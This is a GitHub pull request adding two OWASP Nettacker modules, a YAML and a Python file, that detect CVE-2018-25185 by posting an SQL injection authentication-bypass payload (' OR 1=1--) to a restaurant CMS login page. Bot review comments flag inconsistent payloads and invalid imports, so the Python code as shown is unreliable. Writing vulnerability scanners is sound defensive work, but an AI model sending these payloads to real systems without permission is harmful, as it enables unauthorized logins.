Skip to content

Add module for CVE-2018-25185 (Wecodex SQLi) #1462

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
gopikahub006 wants to merge 1 commit into
base: master
Choose a base branch
from
Open

Add module for CVE-2018-25185 (Wecodex SQLi) #1462

Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
1 commit
Select commit
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
47 changes: 47 additions & 0 deletions nettacker/modules/vuln/cve_2018_25185.yaml
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,47 @@
info:
name: cve_2018_25185_sqli
author: Gopika
severity: 8
description: SQL Injection vulnerability in Wecodex Restaurant CMS 1.0 via username parameter in /login.php allowing authentication bypass.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25185
profiles:
- vuln
- vulnerability
- http
- high_severity
- cve2018
- cve
- sqli

payloads:
- library: http
steps:
- method: post
timeout: 3
headers:
User-Agent: "{user_agent}"
allow_redirects: false
ssl: false
url:
nettacker_fuzzer:
input_format: "{{schema}}://{target}:{{ports}}/login.php"
prefix: ""
suffix: ""
interceptors:
data:
schema:
- "http"
ports:
- 8080
data:
"username=admin' OR 1=1--&password=test"
Comment on lines +37 to +38
Copy link
Copy Markdown
Contributor

@coderabbitai coderabbitai bot Mar 28, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟡 Minor

Payload inconsistency with companion Python module.

The YAML payload uses username=admin' OR 1=1--&password=test while the Python file (cve_2018_25185_vuln.py line 31) uses username=' OR 1=1--&password=password. Both the username prefix (admin' vs ') and password value (test vs password) differ, which could lead to inconsistent detection results.

Recommend aligning both implementations to use the same payload values.

🤖 Prompt for AI Agents 
Verify each finding against the current code and only fix it if needed.

In `@nettacker/modules/vuln/cve_2018_25185.yaml` around lines 37 - 38, The YAML
payload in cve_2018_25185.yaml currently uses "username=admin' OR
1=1--&password=test" which conflicts with the Python module
cve_2018_25185_vuln.py that sends "username=' OR 1=1--&password=password";
update one of them so both use the exact same payload string (choose which
canonical payload to keep, e.g., "username=' OR 1=1--&password=password" or
"username=admin' OR 1=1--&password=test") and ensure both the YAML entry and the
payload construction in cve_2018_25185_vuln.py match exactly to avoid
inconsistent detection.

response:
condition_type: and
conditions:
status_code:
regex: "200"
reverse: false
content:
regex: "Welcome admin dashboard"
reverse: false
52 changes: 52 additions & 0 deletions nettacker/modules/vuln/cve_2018_25185_vuln.py
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,52 @@
"""
cve_2018_25185_vuln.py
----------------------
Author: K. Gopika
Description: OWASP Nettacker module to detect CVE-2018-25185
(SQL Injection in Wecodex Restaurant CMS 1.0)
Version: 1.0

Detection Logic:
- Sends a POST request to /login.php
- Injects a simple SQL payload: "' OR 1=1--"
- Checks for response behavior indicative of SQL injection
- Does NOT perform any destructive actions
"""

import requests
from modules.core import *
from modules import print_good, print_error
Comment on lines +16 to +18
Copy link
Copy Markdown
Contributor

@coderabbitai coderabbitai bot Mar 28, 2026

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
# Verify the correct import paths in Nettacker
echo "=== Check package structure ==="
fd -t d -d 2 . nettacker/

echo ""
echo "=== Check how other modules import core functionality ==="
rg -n "^from nettacker" nettacker/modules/ | head -20

echo ""
echo "=== Check if modules.core exists ==="
fd -p "modules/core" nettacker/

Repository: OWASP/Nettacker

Length of output: 561

🏁 Script executed:

#!/bin/bash
# Check actual import patterns in modules directory
echo "=== Import patterns in nettacker/modules/ (sample) ==="
rg -n "^(from|import)" nettacker/modules/ | head -30

echo ""
echo "=== Check the specific file content ==="
cat -n nettacker/modules/vuln/cve_2018_25185_vuln.py | head -25

Repository: OWASP/Nettacker

Length of output: 1256

🏁 Script executed:

#!/bin/bash
# Find where print_good and print_error are defined
echo "=== Search for print_good and print_error definitions ==="
rg -n "def print_good|def print_error" nettacker/

echo ""
echo "=== Check __init__.py files ==="
find nettacker/ -name "__init__.py" -type f

echo ""
echo "=== Check if modules directory has __init__.py ==="
ls -la nettacker/modules/__init__.py 2>&1

echo ""
echo "=== Check all imports using modules. pattern ==="
rg -n "from modules\.|import modules" nettacker/ | head -20

Repository: OWASP/Nettacker

Length of output: 860

🏁 Script executed:

#!/bin/bash
# Search more broadly for print_good and print_error
echo "=== Search for print_good everywhere ==="
rg "print_good" nettacker/ | head -20

echo ""
echo "=== Check a sample of other vuln module imports ==="
head -30 nettacker/modules/vuln/cve_2021_3177_vuln.py 2>/dev/null || head -30 nettacker/modules/scan/*.py 2>/dev/null | head -40

echo ""
echo "=== List some vuln module files ==="
ls nettacker/modules/vuln/ | head -10

echo ""
echo "=== Check core __init__.py for exported functions ==="
head -50 nettacker/core/__init__.py

Repository: OWASP/Nettacker

Length of output: 757

🏁 Script executed:

#!/bin/bash
# Find all Python files in modules
echo "=== All .py files in nettacker/modules/ ==="
find nettacker/modules/ -name "*.py" -type f

echo ""
echo "=== Full content of core/__init__.py ==="
cat nettacker/core/__init__.py

echo ""
echo "=== Check main.py for sys.path setup ==="
grep -n "sys.path\|insert\|append" nettacker/main.py | head -20

echo ""
echo "=== Check if modules package exists anywhere ==="
find . -maxdepth 2 -name "modules" -type d

Repository: OWASP/Nettacker

Length of output: 302

Fix invalid imports that will cause runtime failure.

The imports are incorrect for Nettacker's package structure:

  • from modules.core import *modules.core doesn't exist; should be from nettacker.core import *
  • from modules import print_good, print_errorprint_good and print_error don't exist in the codebase

Additionally, the wildcard import makes it impossible to determine what names are being imported and is flagged by static analysis (F403).

🧰 Tools
🪛 Ruff (0.15.7)

[error] 17-17: from modules.core import * used; unable to detect undefined names

(F403)

🤖 Prompt for AI Agents 
Verify each finding against the current code and only fix it if needed.

In `@nettacker/modules/vuln/cve_2018_25185_vuln.py` around lines 16 - 18, Replace
the invalid and wildcard imports: remove "from modules.core import *" and "from
modules import print_good, print_error" and instead import only the specific
names used in this file from the correct package path (e.g., "from
nettacker.core import <ExactNamesUsed>" or other specific functions/classes),
and remove or replace references to non-existent print_good/print_error with the
actual logging/util functions present in the codebase; locate usages of
print_good and print_error in cve_2018_25185_vuln.py and swap them to the
correct functions (or import the correct symbols) so there are no wildcard
imports and no imports from non-existent modules.


# Module metadata for Nettacker
MODULE_NAME = "cve_2018_25185_vuln"
MODULE_DESCRIPTION = "Detects CVE-2018-25185 SQLi in Wecodex Restaurant CMS"
MODULE_AUTHOR = "K. Gopika"
MODULE_VERSION = "1.0"

def scan(target_ip, target_port):
"""
Main scan function for the module
"""
url = f"http://{target_ip}:{target_port}/login.php"
payload = {"username": "' OR 1=1--", "password": "password"}

try:
response = requests.post(url, data=payload, timeout=5)

# Check for conditions indicating SQLi
if "Welcome admin dashboard" in response.text and response.status_code == 200:
print_good(f"[+] {target_ip}:{target_port} is vulnerable (CVE-2018-25185)")
return {"target": target_ip, "port": target_port, "status": "Detected"}
else:
print_error(f"[-] {target_ip}:{target_port} appears safe")
return {"target": target_ip, "port": target_port, "status": "Not Detected"}

except requests.exceptions.RequestException as e:
print_error(f"[!] Error connecting to {url}: {e}")
return {"target": target_ip, "port": target_port, "status": "Error"}

# Entry point for manual testing
if __name__ == "__main__":
target_ip = input("Enter target IP: ")
target_port = input("Enter target port: ")
scan(target_ip, target_port)
Loading